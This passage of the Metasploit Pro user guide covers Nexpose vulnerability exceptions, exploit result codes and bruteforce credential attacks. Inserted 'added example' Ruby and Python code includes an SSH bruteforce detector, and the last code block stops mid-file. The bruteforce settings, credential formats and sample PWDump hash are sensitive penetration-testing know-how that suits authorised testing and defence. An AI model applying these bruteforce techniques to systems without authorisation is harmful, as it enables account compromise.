3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of validations displayed.
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability exceptions, the state will be failed.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exceptions displayed.
Nexpose Exceptions
An exception defines the reason why a vulnerability exists. You apply exceptions to vulnerabilities that are typically low-risk or are used deliberately to mitigate bigger threats. Vulnerability exceptions help you exclude certain vulnerabilities from a report so that you can manage your risk score.
You can apply exceptions to vulnerabilities that Metasploit Pro was unable to exploit. These vulnerabilities have a status of Not Exploitable, which indicates that Metasploit Pro was unable to obtain a session on the target host due to some compensating control or back porting. Exceptions can be defined for vulnerabilities for the following reasons:
They are used as compensating controls or to mitigate additional risks.
They represent an acceptable use case or deliberate practice, such as anonymous FTP access.
They represent an acceptable risk and may require more resources than you are willing to invest to remediate. These vulnerabilities typically pose a minimal risk.
They are false positives.
From the Exceptions page, you can perform the following tasks:
View all the vulnerabilities that Metasploit Pro was unable to exploit.
Assign the exception reason for each vulnerability.
Assign expiration dates for vulnerability exceptions.
Add comments to the vulnerability exception.
Automatically approve vulnerability exception requests.
Push exceptions back to Nexpose.
3. Click the Nexpose Console dropdown and select the console you want to push the exceptions to.
4. For each vulnerability, click the Reason dropdown and choose the vulnerability exception reason you want to assign to it. You can also provide additional information for the exception in the Comment field. For more information on exception reasons, see Vulnerability Exception Reasons on page 191.
Note: If you want to define bulk exception settings for all hosts in a vulnerability group, select the All Hosts with this Vulnerability option. The Reason and Comment fields become available under the vulnerability name. The reason you select applies to all hosts in that vulnerability group.
5. Choose the All Expire option if you want to set an expiration date for the vulnerability exceptions. If you do not want to set an expiration date for any vulnerability exceptions, keep the default Never Expire option selected and go to Step 6.
6. To set the same expiration date for all vulnerability exceptions, select the All Expire option. A calendar appears. Find and select the date that you want to use. If you want to set a unique expiration date for each host, skip this step and go to the next step.
7. To set a unique expiration date for each host:
a. Select the All Expire option.
b. Click on the Expire field next to each host to display the calendar.
c. Find the expiration date that you want to use and select it.
8. Deselect the Automatically Approve option if you do not want to approve any of the vulnerability exception requests from Metasploit Pro. Instead, you will manually approve the exception requests through the Nexpose Console.
9. Select the hosts that you want to push exceptions for. Use the Select All Hosts checkbox if you want to push exceptions for all hosts.
10. When you are ready to push the exceptions, click the Push Exceptions button.
False positive - Use this exception reason for a vulnerability that does not exist.
Compensating control - Use this exception reason to indicate that a vulnerability is a compensating control, or a workaround for a security requirement.
Acceptable use - Use this exception reason for any vulnerability that is used as part of organizational practices.
Acceptable risk - Use this exception reason for any vulnerability that is considered low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth.
Other - Use this exception reason to define a custom exception. If you select Other, you can provide a custom exception reason in the Comment field.
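The exception push described in the steps above, with the reason list applied, as an added Ruby example (not Metasploit Pro's or Nexpose's own code): it refuses exceptions for findings with a status of Exploited, validates the reason and expiration date, and supports the All Hosts with this Vulnerability and All Expire choices. The findings, the console name, the rule that Other must carry a comment, and the payload layout are assumptions.

```ruby
require 'date'

# Added example (not Metasploit Pro's own code): build and validate a Nexpose
# exception push like the one configured on the Exceptions page. The findings,
# the console name and the shape of the resulting hash are assumptions; this is
# not the format Metasploit Pro actually sends to Nexpose.
EXCEPTION_REASONS = ['False positive', 'Compensating control',
                     'Acceptable use', 'Acceptable risk', 'Other'].freeze

# Constructed validation results (status as shown on the Findings window).
FINDINGS = [
  { host: '10.0.0.5', vuln: 'anon_ftp',     status: 'Not Exploitable' },
  { host: '10.0.0.6', vuln: 'anon_ftp',     status: 'Not Exploitable' },
  { host: '10.0.1.9', vuln: 'weak_ssh_mac', status: 'Not Exploitable' },
  { host: '10.0.1.9', vuln: 'smb_signing',  status: 'Exploited' }
].freeze

class ExceptionPush
  Entry = Struct.new(:host, :vuln, :reason, :comment, :expires)
  attr_reader :entries

  def initialize(console:, findings:, auto_approve: true, today: Date.today)
    @console, @findings, @auto_approve, @today = console, findings, auto_approve, today
    @entries = []
  end

  # One host, one vulnerability: the per-row Reason, Comment and Expire fields.
  # Only findings Metasploit Pro could not exploit may receive an exception.
  def add(host, vuln, reason:, comment: nil, expires: nil)
    finding = @findings.find { |f| f[:host] == host && f[:vuln] == vuln }
    raise ArgumentError, "no finding for #{vuln} on #{host}" unless finding
    raise ArgumentError, "#{vuln} on #{host} was exploited; it needs remediation, not an exception" unless finding[:status] == 'Not Exploitable'
    raise ArgumentError, "unknown reason #{reason.inspect}" unless EXCEPTION_REASONS.include?(reason)
    # Other carries its custom reason in Comment; this example requires it (assumption).
    raise ArgumentError, 'reason Other needs a comment' if reason == 'Other' && comment.to_s.strip.empty?
    raise ArgumentError, 'expiration date must be after today' if expires && expires <= @today
    @entries << Entry.new(host, vuln, reason, comment, expires)
    self
  end

  # "All Hosts with this Vulnerability": one reason applied to the whole group.
  def add_for_vulnerability(vuln, reason:, comment: nil, expires: nil)
    hosts = @findings.select { |f| f[:vuln] == vuln && f[:status] == 'Not Exploitable' }.map { |f| f[:host] }
    raise ArgumentError, "no Not Exploitable hosts for #{vuln}" if hosts.empty?
    hosts.each { |h| add(h, vuln, reason: reason, comment: comment, expires: expires) }
    self
  end

  # "All Expire": the same expiration date for every exception in the push.
  def expire_all(date)
    raise ArgumentError, 'expiration date must be after today' if date <= @today
    @entries.each { |e| e.expires = date }
    self
  end

  def reason_counts
    @entries.group_by(&:reason).transform_values(&:size)
  end

  # true when the requests must still be approved in the Nexpose Console.
  def needs_console_approval?
    !@auto_approve
  end

  def payload
    { console: @console, auto_approve: @auto_approve,
      exceptions: @entries.map { |e|
        { host: e.host, vulnerability: e.vuln, reason: e.reason, comment: e.comment,
          expires: e.expires ? e.expires.iso8601 : 'never' }
      } }
  end
end
```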
Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
Unreachable - Indicates that Metasploit Pro could not reach the network service.
Bad-config - Indicates that the exploit settings were configured incorrectly.
Disconnected - Indicates that the network service disconnected during a module run.
Not-found - Indicates that Metasploit Pro could not find the application or service.
Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.
Timeout-expired - Indicates that a timeout occurred.
User-interrupt - Indicates that the user stopped the module run.
No-access - Indicates that Metasploit Pro could not access the application.
No-target - Indicates that the module configuration was not compatible with the target.
Not-vulnerable - Indicates that the application was not vulnerable.
Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
Validated Vulnerabilities
A validated vulnerability is a vulnerability that Metasploit Pro was able to successfully exploit to obtain a session on a target host. Typically, the ability to gain a session on a target host provides enough evidence to show that a vulnerability poses a real security risk. However, you can use the session to collect additional evidence, such as screenshots, system files, and password files. If Metasploit Pro is able to successfully exploit a vulnerability, the exploit status for the host will be Exploited. All vulnerabilities with a status of Exploited can be sent back to Nexpose as a validated vulnerability.
3. Click the Push Exploited Vulnerabilities button. The Task Log appears and shows you when the push is complete.
3. Scroll down to the Site Listing and find the site that you imported and tested in Metasploit Pro.
5. Scroll down to the Asset Listing and find the asset that has the validated vulnerability.
6. Click on the asset name. The asset page appears.
7. Find the Vulnerability Listing.
8. Click on the Exploited column to sort by validated vulnerabilities. Validated vulnerabilities will appear at the top of the column.
3. Use the filters to create the following query: validated vulnerabilities are present.
4. Click the Search button. The search returns a list of assets that have validated vulnerabilities.
Chapter 8:
Nexpose
About Nexpose on page 198
Nexpose Scan on page 200
Import Nexpose Data on page 204
Nexpose Asset Groups on page 212
About Nexpose
Vulnerability analysis is the process that detects, identifies, and assesses the vulnerabilities that exist within an organizational infrastructure. A vulnerability is a characteristic of an asset that an attacker can exploit to gain unauthorized access to sensitive data, inject malicious code, or generate a denial of service attack. To prevent security breaches, it is important to identify and remediate security holes and vulnerabilities that can expose an asset to an attack.
Generally, to perform vulnerability analysis, you perform the following steps:
1. Define and classify network or system resources.
2. Identify potential threats for each resource.
3. Prioritize the risks.
4. Develop a plan to remediate the vulnerabilities.
Nexpose automates the steps that you typically use to find and analyze vulnerabilities. Nexpose scans the assets to identify the active services, open ports, and applications that run on each machine. After the scan, Nexpose attempts to identify vulnerabilities that may exist based on the attributes of the known services and applications. Nexpose discloses the results in a scan report, which helps you to prioritize vulnerabilities based on risk factor and determine the most effective solution to implement.
Nexpose Terminology
The following are common Nexpose terms:
Site
A site is a logical group of assets that has a dedicated scan engine. A site is similar to a project. However, projects are more for intermittent spot tests, whereas sites can run over a long period of time and provide you with historical, trending data.
Asset
An asset is a host or target that Nexpose scans for vulnerabilities.
Asset Group
An asset group is a collection of assets. An asset group does not have a dedicated scan engine. Instead,
Scan Template
A scan template defines the audit level that Nexpose uses to perform a vulnerability scan.
Nexpose Scan
You can use the Community and Enterprise editions of Nexpose to scan assets for known vulnerabilities. After you run a Nexpose scan, you can import the scan data into Metasploit Pro to validate the results of the vulnerability scan. Metasploit Pro provides a connector that allows you to run a Nexpose scan and automatically import the scan results into a project. Before you can run a Nexpose scan, you must configure a Nexpose Console for Metasploit Pro to use.
Metasploit Pro only supports the number of hosts that you have licenses for in Nexpose. If you provide more hosts than the number of licenses that you have available, the scan fails. For example, if you have a Community license, the maximum number of hosts Nexpose supports is 32. If you provide 35 hosts, the scan fails.
You can download the Community edition of Nexpose from http://www.rapid7.com/vulnerabilityscanner.jsp. For more information on how to install and configure Nexpose, visit http://community.rapid7.com.
5. Enter the console address. For example, if Nexpose runs on the local system, you can use 127.0.0.1.
7. Enter the user name that you use to log in to the Nexpose Console.
8. Enter the password that you use to log in to the Nexpose Console.
9. Select the Enabled option to initialize and activate the Nexpose Console.
10. Save the configuration.
3. When the Import Data window appears, click Choose File to choose a file to import.
4. When the File Upload window appears, navigate to and choose a file to import.
5. Click Open after you select the file.
6. In the Exclude Address field, enter the target addresses that you want to leave out of the import.
7. Select Do not change existing hosts if you want to retain the current host information.
8. Click the Import button.
When the Scan Template Configuration page displays, locate the URL address box at the top of the Nexpose Console. The URL address box displays the address and the template ID for the scan template. For example, in the following address, https://my.console.address:3780/admin/wizard/scantemplate.html?templateid=dos-audit, the template ID is dos-audit. For more information on scan template IDs, visit the Nexpose documentation.
1. From within a project, click the Analysis tab.
2. Click Nexpose from the Quick Tasks menu.
3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project.
4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line.
5. Click the Scan Template list. Choose Custom, which enables you to select a custom scan template.
6. Click Show Advanced Options.
7. From the Advanced Nexpose Scan Settings area, enter the ID of the scan template that you want to use in the Custom scan template name field.
Note: Scan template IDs cannot contain a hyphen. If the scan template ID contains a hyphen, replace the hyphen with an underscore. If the scan template ID changes, the Nexpose scan does not update the scan template ID. You must update the Nexpose scan to use the new scan template ID.
8. Launch the Nexpose scan.
fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address.
7. Select a scan template.
8. Click Show Advanced Options to configure additional options for the scan.
9. Select the Purge Scan results upon completion option.
10. Launch the Nexpose scan.
Note: For more information on configuring a Nexpose Console, see Configuring a Nexpose Console on page 200.
1. Open the project that you want to import data into.
2. From the Tasks bar, click the Import button. The Import Data page appears.
3. Click the Choose File button to find the file you want to import. The File Upload window appears.
Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export.
4. Find and choose the Nexpose export you want to import.
5. Click Open after you select the file.
6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field.
Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information.
8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them.
9. Enable any additional tags that you want to assign to the assets.
10. Import the data.
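The address entries accepted by the Exclude Addresses and Scan targets fields described in this chapter and in the wizard (a single IP, a hyphenated range, a CIDR block, separated by commas in the wizard and by newlines on the Import Data page), parsed and applied to a constructed import as an added Ruby example that is not Metasploit Pro's own code. The `first-last` form of a hyphenated range and the host records are assumptions.

```ruby
require 'ipaddr'

# Added example (not Metasploit Pro's own code): parse the address entries
# accepted by the Excluded Addresses and Scan targets fields (single address,
# hyphenated range, CIDR block) and use them to filter an import. Wizard fields
# separate entries with commas and the Import Data page with newlines, so both
# separators are accepted here. A hyphenated range is assumed to be written as
# two full addresses, "first-last".
class AddressSet
  def self.parse(text)
    entries = text.split(/[\s,]+/).reject(&:empty?)
    raise ArgumentError, 'no addresses given' if entries.empty?
    new(entries)
  end

  def initialize(entries)
    @ranges = entries.map { |e| parse_entry(e) }
  end

  def size
    @ranges.size
  end

  def include?(address)
    ip = IPAddr.new(strip_zone(address))
    @ranges.any? { |r| r.cover?(ip) }
  end

  private

  # Every entry becomes a Range of IPAddr, so membership is one comparison
  # per entry rather than an enumeration of every address in a block.
  def parse_entry(entry)
    if entry.include?('/')                       # CIDR: 10.0.0.0/24, 2001:db8::/32
      IPAddr.new(entry).to_range
    elsif entry.include?('-')                    # range: 192.168.50.1-192.168.50.10
      first, last = entry.split('-', 2).map { |a| IPAddr.new(strip_zone(a)) }
      raise ArgumentError, "mixed address families in #{entry}" unless first.family == last.family
      raise ArgumentError, "range start is after its end in #{entry}" if first > last
      first..last
    else                                         # single address
      ip = IPAddr.new(strip_zone(entry))
      ip..ip
    end
  rescue IPAddr::InvalidAddressError => e
    raise ArgumentError, "invalid address entry #{entry.inspect}: #{e.message}"
  end

  # Link-local IPv6 addresses carry an interface ID (fe80::1%eth0); the zone
  # is dropped here so the address part can be compared like any other.
  def strip_zone(address)
    address.sub(/%\w+\z/, '')
  end
end

# Constructed hosts standing in for a Nexpose import (not real assets).
IMPORTED_HOSTS = [
  { ip: '10.0.0.5',     name: 'web01' },
  { ip: '10.0.0.200',   name: 'web02' },
  { ip: '10.0.1.9',     name: 'db01' },
  { ip: '192.168.50.7', name: 'jump01' },
  { ip: 'fe80::1',      name: 'printer' }
].freeze

# Applies an Exclude Addresses entry to an import and returns the hosts kept.
def apply_exclusions(hosts, exclude_text)
  excluded = AddressSet.parse(exclude_text)
  hosts.reject { |h| excluded.include?(h[:ip]) }
end
```

A malformed entry (reversed range, mixed IPv4/IPv6 endpoints, unparsable text) raises before any host is filtered, so a typo in the exclusion list cannot silently import or drop assets.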
Vulnerability Exceptions
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. For example, you may want to define an exception for a vulnerability that poses minimal security risk, but requires more resources than you want to invest. In this particular case, it may be more cost effective to accept the vulnerability as a known risk than to remediate it.
When you import Nexpose data or perform a Nexpose scan, Metasploit Pro pulls the exception data for the vulnerability and stores it in the project. After you test and verify the vulnerabilities, you may want to use the results of the penetration test to update the vulnerability exception for each asset. Use the Nexpose Exception Push feature in Metasploit Pro to create and approve vulnerability exceptions for an asset. After you define the exceptions, you can export, or push, the vulnerability exceptions from Metasploit Pro to Nexpose. The Nexpose Console displays the updated vulnerability exception information on the Asset Summary page.
Note: You can only create an exception for a vulnerability that you import from Nexpose.
False positive - You may want to exclude false positives reported by Nexpose. A false positive occurs when a vulnerability scanner detects a vulnerability when none exists.
Compensating control - You may want to exclude vulnerabilities that have mitigated risks. For example, if a vulnerability exists on a device that has a firewall in place, an organization may determine that the firewall provides enough protection and relegate the vulnerability to a minimal threat.
Acceptable use - You may want to create an exception for vulnerabilities that are part of organizational practices.
Acceptable risk - You may want to exclude vulnerabilities that are low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth.
If the project does not contain an active Nexpose Console or assets, the Nexpose Exception Push feature is unavailable.
When you import or scan assets from Nexpose, you should enable automatic tagging. A tag is a label that you apply to an asset in order to group assets together based on a set of criteria. A tag helps you quickly identify and find assets to run tests against.
1. Select Project > [Project Name] > Vulnerabilities from the main menu.
2. When the list of assets and vulnerabilities appears, select the assets that you want to use to create vulnerability exceptions.
3. Click Nexpose Exceptions.
4. When the New Nexpose Exceptions Push window appears, choose the Nexpose Console that you want to use to push the vulnerability exceptions.
5. Choose if you want to automatically approve the vulnerability exception. If you do not enable this option, you will need to approve the vulnerability exception request through the Nexpose Console.
6. Choose if you want to set an expiration date for the vulnerability exception. If you choose this option, Nexpose will remove the exception from the asset on the date that you specify.
7. The Vulnerability Exceptions area displays a table that lists the vulnerability information for each asset that you added to the exception push. Select the vulnerability that you want to create an exception for.
8. Choose a reason for the exception.
9. Add any additional comments about the exception, such as how the vulnerability meets the requirements for the exception.
10. Create the exceptions.
After you create the exceptions, open the Nexpose Console and verify that the asset shows the vulnerability exception that you pushed from Metasploit Pro.
Vulnerability Tracking
The Metasploit Web UI provides an interactive interface that you can use to visualize and validate the vulnerability data from a Nexpose report. Metasploit Pro identifies the assets, imports vulnerability data, indexes the data, and attempts to map each vulnerability to an exploit. Metasploit Pro displays most of the content for each asset on the Hosts page. The Hosts page provides you with a high-level view of the assets that Metasploit Pro imported. You can see the number of services, vulnerabilities, and exploit attempts for each host. If you want to explore a bit more, you can visit the Vulnerabilities tab to learn more about each asset.
Attempts Tab
If Metasploit Pro has run any module against the host, you can view the results from the Attempts tab. The Attempts tab shows when the modules were run, the person who launched the module, the result code for the module run, and the reason the module failed or succeeded. For example, you may want to view the Attempts tab if you want to find a list of modules that Metasploit Pro has run against a particular port or service.
Result Codes
A result code provides the reason why a module did not run successfully. The following result codes are available:
None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
Unreachable - Indicates that Metasploit Pro could not reach the network service.
Bad-config - Indicates that the exploit settings were not configured correctly.
Disconnected - Indicates that the network service disconnected during a module run.
Not-found - Indicates that Metasploit Pro could not find the application or service.
Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.
Timeout-expired - Indicates that a timeout occurred.
User-interrupt - Indicates that the user stopped the module run.
No-access - Indicates that Metasploit Pro could not access the application.
No-target - Indicates that the module configuration was not compatible with the target.
Not-vulnerable - Indicates that the application was not vulnerable.
Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
Modules Tab
Metasploit Pro automatically maps modules to a host based on the open services and vulnerability information that is available. Due to the number of vulnerability checks that are available, Metasploit matches exploits based on services rather than vulnerabilities. The Modules tab displays a full list of exploits and auxiliary modules that Metasploit Pro can run against a particular asset.
Source Tab
The Source tab identifies the device used to import the host. For example, if you imported assets from a Nexpose report, the Source tab shows the Nexpose console ID and device ID.
Chapter 9:
Password Cracking
About Password Cracking on page 218
Bruteforce Attacks on page 218
Word Lists on page 232
Credential Management on page 229
Bruteforce Attacks - A bruteforce attack attempts a large number of common user name and password combinations to gain access to hosts. Metasploit Pro provides you with several preset bruteforce profiles that you can use to customize the bruteforce attack for the target environment. When Metasploit Pro successfully identifies a credential in a session-capable module, such as SMB, SSH, Telnet, or MSSQL, the system automatically opens the session.
John the Ripper - John the Ripper, or JtR, is a tool that you can use to crack password hashes in order to recover weak passwords. To run JtR, you need to perform a module search for John the Ripper. There are JtR modules available for Linux, Windows, Oracle, and MySQL with varying bruteforce modes. Choose the module that works best for your target systems.
Bruteforce Attacks
A bruteforce attack tries a large number of common user name and password combinations in order to open a session on the target machine. After the bruteforce attack successfully guesses a credential, the system stores the user name and password in the workspace. In Metasploit Pro, a bruteforce attack launches service-specific modules to attempt to crack the credentials for the service. You can choose the services and ports that you want to target, and the bruteforce attack chooses modules that target those services. If the bruteforce attack successfully cracks a credential and opens a session, you can use the session to gain further access to, and information about, the system. To run a bruteforce attack, you must define the services that you want to target on a particular host or network range. In addition to the services, you can configure the bruteforce attack to exclude specific hosts and credentials, perform a dry run, and use a particular payload type.
The following list describes the color codes that Metasploit Pro uses for bruteforce tasks:
Green Message - Good status indicator
Yellow Message - Credential found indicator
Red Message - Bad status indicator
The default only mode generates the following credentials:
16 credentials for PostgreSQL
29 credentials for DB2
141 credentials for SSH
141 credentials for Telnet
22 credentials for MSSQL
150 credentials for HTTP
4 credentials for HTTPS
13 credentials for SMB
21 credentials for FTP

4,000 credentials for PostgreSQL
3,000 credentials for DB2
10,000 credentials for MySQL
1,000 credentials for SSH
1,000 credentials for Telnet
10,000 credentials for MSSQL
6,000 credentials for HTTP
1,000 credentials for HTTPS
4,000 credentials for SMB
1,000 credentials for FTP
The system tries these generated credentials after the currently known good credentials. The system adjusts these credential counts after each successive run as credentials become known while the modules run.
12,000 credentials for PostgreSQL:5432
9,000 credentials for DB2:50000
30,000 credentials for MYSQL:3306
132 credentials for SSH:22
132 credentials for Telnet:23
30,000 credentials for MSSQL:13013
18,000 credentials for HTTP:8080 (tomcat)
3,000 credentials for SMB:445 (Microsoft)
SSH and Telnet are not subject to the deep multiplier because these credentials take longer to test than the other services.
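The credential volumes listed above (thousands of guesses per service within a single task, with only SSH and Telnet kept to a few hundred) are what make a bruteforce run visible on the receiving side. The following is an added example, not code from this guide or from Metasploit Pro: a small Python detector that reads constructed sshd-style authentication lines and flags a source once its densest one-minute burst of failures reaches a threshold. It separates the dictionary pattern (several passwords per account) from the one-password-across-many-accounts pattern, and reports any account that then logged in from the same source, which is the case the guide describes as a guessed credential opening a session. The log lines, the window length and the thresholds are assumptions constructed for the demonstration.

```python
"""Detect bruteforce and password-spray bursts in constructed sshd-style auth logs.

Added example for this guide; it is not Metasploit Pro code. The log lines,
thresholds and field layout are assumptions constructed for the demonstration.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed syslog/sshd lines (not captured output). 10.0.0.5 runs a
# dictionary bruteforce (several passwords per account) and then succeeds;
# 172.16.0.9 tries one password against many accounts; 192.168.1.20 is a
# normal user who mistyped once.
SAMPLE_LOG = """\
Mar 10 10:00:01 host1 sshd[2001]: Failed password for root from 10.0.0.5 port 40001 ssh2
Mar 10 10:00:02 host1 sshd[2002]: Failed password for root from 10.0.0.5 port 40002 ssh2
Mar 10 10:00:03 host1 sshd[2003]: Failed password for admin from 10.0.0.5 port 40003 ssh2
Mar 10 10:00:04 host1 sshd[2004]: Failed password for admin from 10.0.0.5 port 40004 ssh2
Mar 10 10:00:05 host1 sshd[2005]: Failed password for invalid user oracle from 10.0.0.5 port 40005 ssh2
Mar 10 10:00:06 host1 sshd[2006]: Failed password for invalid user test from 10.0.0.5 port 40006 ssh2
Mar 10 10:00:07 host1 sshd[2007]: Accepted password for admin from 10.0.0.5 port 40007 ssh2
Mar 10 10:02:00 host1 sshd[2020]: Failed password for alice from 172.16.0.9 port 41001 ssh2
Mar 10 10:02:10 host1 sshd[2021]: Failed password for bob from 172.16.0.9 port 41002 ssh2
Mar 10 10:02:20 host1 sshd[2022]: Failed password for carol from 172.16.0.9 port 41003 ssh2
Mar 10 10:02:30 host1 sshd[2023]: Failed password for dave from 172.16.0.9 port 41004 ssh2
Mar 10 10:02:40 host1 sshd[2024]: Failed password for erin from 172.16.0.9 port 41005 ssh2
Mar 10 10:05:00 host1 sshd[2010]: Failed password for alice from 192.168.1.20 port 50001 ssh2
Mar 10 10:30:00 host1 sshd[2011]: Accepted password for alice from 192.168.1.20 port 50002 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_auth_log(text):
    """Return one event dict per recognised line; unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; only relative deltas are needed here
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append({"ts": ts, "ok": m["result"] == "Accepted",
                       "user": m["user"], "src": m["src"]})
    return events


def detect_bruteforce(events, window_s=60, fail_threshold=5, spray_users=3):
    """Flag sources whose densest failure window reaches fail_threshold.

    Returns {src: {"kind", "failures", "users", "success_users"}}. kind is
    "password-spray" when the burst touches spray_users or more accounts with
    a single failure each (one password across many users), otherwise
    "bruteforce" (many passwords against few users). success_users lists the
    accounts that logged in from the same source after the burst began.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["ok"]]
        worst, start = [], 0
        for end in range(len(fails)):  # sliding window over this source's failures
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > len(worst):
                worst = fails[start:end + 1]
        if len(worst) < fail_threshold:
            continue
        per_user = Counter(e["user"] for e in worst)
        spray = len(per_user) >= spray_users and max(per_user.values()) == 1
        first_fail = worst[0]["ts"]
        findings[src] = {
            "kind": "password-spray" if spray else "bruteforce",
            "failures": len(worst),
            "users": sorted(per_user),
            "success_users": sorted({e["user"] for e in evs
                                     if e["ok"] and e["ts"] > first_fail}),
        }
    return findings


if __name__ == "__main__":
    for src, finding in detect_bruteforce(parse_auth_log(SAMPLE_LOG)).items():
        print(src, finding)
```

The detector keys on rate within a window rather than on total volume, so it still fires for the services whose credential counts stay in the low hundreds; on the constructed input it reports 10.0.0.5 as a bruteforce with a subsequent successful login for admin, and 172.16.0.9 as a spray.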
Target Services
Bruteforce targets the following services: SMB, PostgreSQL, DB2, MySQL, MSSQL, Oracle, HTTP, HTTPS, SSH, SSH_PUBKEY, Telnet, FTP, POP3, EXEC, LOGIN, SHELL, VNC, SNMP, and AFP.
Target Addresses
Defines the hosts explicitly included in the bruteforce attack.
Excluded Addresses
Defines the hosts explicitly excluded from the bruteforce attack.
Dry run
Runs a bruteforce attack, prints a transcript of the modules, and quits the attack. Metasploit Pro does not run a live bruteforce attack against the target system.
Additional credentials
Defines the user name and password combinations that the bruteforce attack uses. Use commas to separate user name and password combinations. Use one of the following methods to specify additional credentials for the bruteforce attack:
For domain-specific user name and password combinations, use the following format: domain/username.password.
For user names with no password, define the user name only.
For user names with multiple passwords, use the following format: username password1, password2, password3.
SMB Domains
Adds the domain as a space-delimited list for services that accept Windows-based authentication.
Payload Type
Specifies the type of payload that the bruteforce attack uses. You can choose Meterpreter or command shell.
Listener Ports
Defines the port or port range that the bruteforce attack uses in reverse connect payloads.
Connection Type
Defines the connection type that the payload uses. Choose from auto, reverse, or bind.
Timeout overall
Limits the total amount of time that the system allocates to the bruteforce attack.
Target Services
After Metasploit Pro opens the session, you can select the services that you want to target in the bruteforce attack. You can target the following services:
MySQL
MSSQL
Oracle
POP3
Postgres
Shell
SMB
SNMP
SSH
SSH_PUBKEY
Telnet
VMAUTHD
VNC
WinRM
credentials, then you can use the credentials to administer VMware. You cannot access VMware directly from Metasploit Pro. However, after you gain access to a virtual machine, you can run post-exploitation modules to identify more information about the machine, such as configuration settings, logins, and other virtual machines.
1. Open a project.
2. Click the Analysis tab.
3. Select the virtual target that you want to bruteforce.
4. Click Bruteforce. The Bruteforce window appears.
5. Metasploit Pro automatically populates the target address field with the vmauthd target address.
6. Launch the bruteforce attack.
5. Select Quick for depth of the bruteforce attack.
6. Select the services that you want the bruteforce attack to target.
7. Click Show Advanced Options to configure additional options for the bruteforce attack.
8. Enter the credential that you want to use for the bruteforce attack in the Additional Credentials field. For example, enter admin admin.
9. Launch the bruteforce attack.
Credential Management
You can import sets of untested credentials into Metasploit Pro. Use imported credentials when you run the scan in normal, deep, or imported only mode. If you import multiple files, Metasploit Pro consolidates the credentials from each file and stores the data within a single, running file. The imported credentials do not display under the credentials area. To view the imported credentials, you can download the imported credentials as a single text file. Note: You should use the Additional Credentials option for known credentials or for bruteforce attacks that use the Include known credentials option.
PWDump
A PWDump file can contain SMB hashes and space-delimited user name and password pairs. Each item must be on a separate line. The bruteforce attack attempts the SMB hash credentials against services that accept SMB hashes as plain text. When you use a PWDump file, you must define the SMB domains to target services that accept Windows authentication. When you use a PWDump file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have exported a Metasploit PWDump.
Example:
administrator:501:de8130a284642c74523fa0f66c35ef02:421a1c7abc7b160c20ed78a2e06e09c8:::
User names and passwords can contain non-ASCII in \xXX notation. For example, you can denote spaces within a user name or password as \x20. When you use a user name and password file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have a list of user names and passwords.
Example:
username1 passwordA
username2 passwordA passwordB
username3 passwordA passwordB passwordC
Passwords only
A passwords only file is a text file that contains only passwords. There can be only one password for each line in the file. Metasploit Pro assigns the passwords to known user names. Passwords can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef. When you use a plain password file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a user name to each password. Use the plain password format if you have a list of passwords and you want Metasploit Pro to specify user names to test against.
Example:
password1
password2
password3
When you use a user names only file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a password to each user name.
Example:
jack
joe
john
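The import formats above differ only in their column layout, so it is worth checking a file before handing it to the importer. The Python script below is an added example, not code from this guide or from Metasploit Pro: it parses the PWDump line format shown in the example above, the user name and password file, and the single-column passwords-only and user-names-only files; decodes the \xXX notation; and reports two things a reviewer of a PWDump export wants to know per account, whether a real LM hash is stored (legacy, weak hashing) and whether the NT hash is the hash of an empty password. The two empty-hash constants are the well-known values for a blank password; the format-sniffing rules in detect_format are this example's own assumption. A single-column file stays ambiguous between the passwords-only and user-names-only importers, which is why the guide asks you to pick the bruteforce depth according to which one you imported.

```python
"""Parse and sanity-check the credential import formats this chapter describes.

Added example for this guide; it is not Metasploit Pro code. The format
sniffing in detect_format is an assumption made for this example.
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
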